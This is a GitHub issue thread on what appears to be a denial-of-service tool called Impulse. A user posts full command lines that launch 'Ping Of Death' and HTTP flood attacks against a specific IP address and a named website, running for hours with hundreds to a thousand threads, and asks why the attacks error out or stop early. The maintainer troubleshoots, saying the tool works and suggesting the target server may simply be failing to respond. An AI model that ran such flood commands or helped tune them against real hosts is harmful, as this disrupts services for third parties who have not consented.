### ISSUE TITLE
Can't use POD

### ISSUE THREAD

**Issue by caipenpen** [LimerBoy/Impulse#39]
I use POD and get error 
```
[!] Error while sending 'Ping Of Death'
[Errno 90] Message too long
```

This is my cmd :

python3 impulse.py --time 3600 --threads 100 --target 173.236.250.238:80 --method POD

And another , I run a cmd

sudo python3 impulse.py --time 21600 --threads 1000 --target https://www.lapegar.com/ --method HTTP

Everything is ok , I set time 5-6 hours , sometimes it will autostop like pic1 after 15-20 minutes

![pic1](https://user-images.githubusercontent.com/66503739/85803707-f81c1980-b771-11ea-899a-b34347b95d6a.jpg)

**Comment by LimerBoy** [comment]
**1.** Works for me 
![pod](https://user-images.githubusercontent.com/43149460/85922984-ed57a680-b88f-11ea-8b04-4d0b44f3114e.png)
**2.** Perhaps the server cannot respond to requests or  your internet is too slow.
